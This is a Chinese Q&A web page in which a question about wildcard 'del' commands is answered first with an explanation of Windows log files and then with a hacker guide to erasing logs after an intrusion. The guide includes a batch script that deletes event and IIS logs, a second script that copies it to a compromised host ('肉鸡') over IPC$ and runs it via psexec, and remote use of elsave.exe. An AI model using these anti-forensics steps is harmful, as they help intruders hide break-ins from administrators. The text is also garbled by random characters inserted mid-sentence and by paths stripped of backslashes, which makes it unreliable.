问题补充说明:del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log 我想知道这命令的最后一个*。LOG中的*是什么意思呀?可以说清楚点吗,问过好多人都不知道,希望有高手在……
就是日志文件,就是记录有关软件的信息,这些文件都可以用记事本打开,其实是纯文本文件。
如何查看日志文件
在Windows系统中查看日志文件很简单。点击“开始→设置→控制面板→管理工具→事件查看器”,在事件查看器窗口左栏中列出本机包含的日志类型,如应用程序、安全、系统等。查看某个日志记录也很简单,在左栏中选中某个来自类型的日志,如应用程序,接着在右栏中列出该类型日志的所有记录扩验变江位国充热,双击其中某个记录,弹出“事件属性”对话框,显示出该记录的详细信息,这样我们就能准确的掌握系统中到底发生了什么事情,是否影响360问答Windows的正常运行,一旦出现问题,即时查找排除。
什么是日志文件?
它是一些文件系统集合,依靠建立起的各种数据的日志文件而存在。在任何系统发生崩溃或需要重新启动时,数据就遵从日志文件中的信息记录原封不动进行拿际验与袁恢复。日志对于系统安全的作福独些上费食轻跑同用是显而易见的,采广些承无论是网络管理员还是黑客都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志。无论是攻还是防,日志的重要性由此可见。下面我们就来简单讨论一下日志文件的清除方法。
一、日志文件的位置
Windows200作客食致另整径期械多0的系统日志文件有应用程序日志,安全日志、系统日装志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemro欢远弦父乱若ot%system32config。
安全日志文件:%systemroot%system32configSecEvent报对.EVT
系统日志文件:%systemroot%system32configSysEvent.EV械调种言委营掉防专如前T
应用程序日志文件:%systemroot%system32configAppEvent.EVT
有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。
二、清除自己电脑中的日志
如果你要清除自己电脑中的日林胞足血志,可以用管理员的身份来登录Win封问节速材景dows,然后在“控制面板”中进入“管理工具”,补参的固肥象美话再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了,里面有应用程序、安全和系统日志文件。举个或妈置盟素响例子,比方说你想清照杨似除安全日志,可以右键点击“安全日志”,在弹出的菜周很特察得还单中选择“属性”。待拿令光娘素移足接下来在弹出的对话框中,点击下面“清除日志”按钮就可以清除了,如果你想以后再来矛标艺标清除这些日志的话,可以将“按需要改写尺寸”,这样就可以在达到最大日志尺首压细片损谁坚低左寸时进行改写事件了,不会提示你清除日志。
三、清除远程主机上的日志
大多数情况下,IIS的日志会忠实地记录它接收到的任何请求(也有特殊的不被IIS记录的攻击),一个优秀的系统管理员会利用这点来发现入侵的企图,保护自己的系统。所以如果你是黑客,入侵系统成功后第一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单,方法是:新建一个具有如下内容的批处理文件:
@delc:winntsystem32logfiles*.*
@delc:winntsystem32config*.evt
@delc:winntsystem32dtclog*.*
@delc:winntsystem32*.log
@delc:winntsystem32*.txt
@delc:winnt*.txt
@delc:winnt*.log
@delc:del.bat
把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。
接下来再新建一个批处理文件,内容如下:
@copydel.bat\%1c$
@echo向肉鸡复制本机的del.bat……OK
@psexec\%1c:del.bat
@echo在肉鸡上运行del.bat,清除日志文件……OK
保存为clean.bat即可,假设已经与肉鸡进行了Ipc连接,然后在CMD下输入:clean.bat肉鸡IP,即可清除肉鸡上的日志文件。
清除日志的另外一个方法是借助第三方软件,如著名黑客软件流光的开发者黑客小榕的elsave.exe,就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件,大家可以在网上下载到。elsave.exe使用起来很简单,首先利用获得的管理员账号与对方建立IPC会话:netuse\ippass/user:user,然后在命令行下执行如下命令:elsave-s\ip-lapplication-C,这样就删除了安全日志。
标签:log
